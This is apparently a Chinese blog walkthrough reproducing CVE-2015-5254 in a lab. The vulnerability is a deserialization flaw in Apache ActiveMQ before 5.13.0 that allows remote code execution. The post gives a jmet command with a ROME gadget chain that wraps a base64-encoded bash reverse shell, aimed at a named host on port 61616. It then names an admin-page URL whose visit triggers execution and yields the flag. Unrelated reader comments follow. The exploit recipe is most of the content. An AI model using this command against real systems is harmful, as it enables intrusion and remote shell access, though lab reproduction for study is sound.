CVE-2015-5254
漏洞描述:Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。
影响版本:Apache ActiveMQ 5.13.0之前5.x版本中
参考资料:
- https://blog.csdn.net/leesir98/article/details/111918336
- https://blog.csdn.net/qq_49780354/article/details/123270945
漏洞复现
- 启动环境会监听两个端口
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y “bash -c {echo,base64加密的反弹shell payload}|{base64,-d}|{bash,-i}” -Yp ROME sm.info-plus.cn 61616
- 借助一个工具
- 执行完之后,进到web管理界面,就是30510端口
http://123.58.224.8:30510/admin/browse.jsp?JMSDestination=event
- 点击之后,自动执行命令
- 获取flag
© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
cesfe 22天前0
好的,谢谢昶之琴 24天前0
这个安装地址失效了,我在网上找了一个:https://xiazai.zol.com.cn/detail/35/344340.shtml 如果还是不行的话就需要您自己去网上找找了cesfe 25天前0
帆软部署 ,访问的地址访问不到昶之琴 2年前0
我以为只要提交就行了好想告诉你 2年前0
花巨资看一下